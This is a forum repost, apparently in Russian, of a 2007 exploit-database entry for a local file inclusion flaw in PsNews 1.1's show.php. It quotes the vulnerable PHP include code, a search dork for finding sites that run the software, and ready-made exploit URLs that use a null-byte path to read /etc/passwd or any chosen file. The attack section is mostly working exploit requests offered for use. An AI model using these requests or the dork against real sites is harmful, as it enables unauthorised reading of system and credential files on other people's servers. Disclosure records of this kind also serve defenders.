Exploit PsNews 1.1 - 'show.php?newspath' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4174
Проверка EDB
  1. Пройдено
Автор
IRK4Z
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3772
Дата публикации
2007-07-12
Код:
#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion                   #
# author: [email protected]                                                       #
# download:                                                                    #
#   http://www.strefaphp.net/index.php?page=download&what=download&fid=12      #
# dork: "Powered by PsNews" ;]                                                 #

/news/show.php:
...
 if(eregi("://", $newspath)){
 	die("Nieautoryzowany dostęp!");
 }
 if(!isset($newspath)){
	 $newspath = "news";
 }
 include("$newspath/functions.php");
...

# exploit:

 http://[site]/[path]/news/show.php?newspath=/etc/passwd%00
 http://[site]/[path]/news/show.php?newspath=[file]%00


# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*

# milw0rm.com [2007-07-12]
 
Источник
www.exploit-db.com

Похожие темы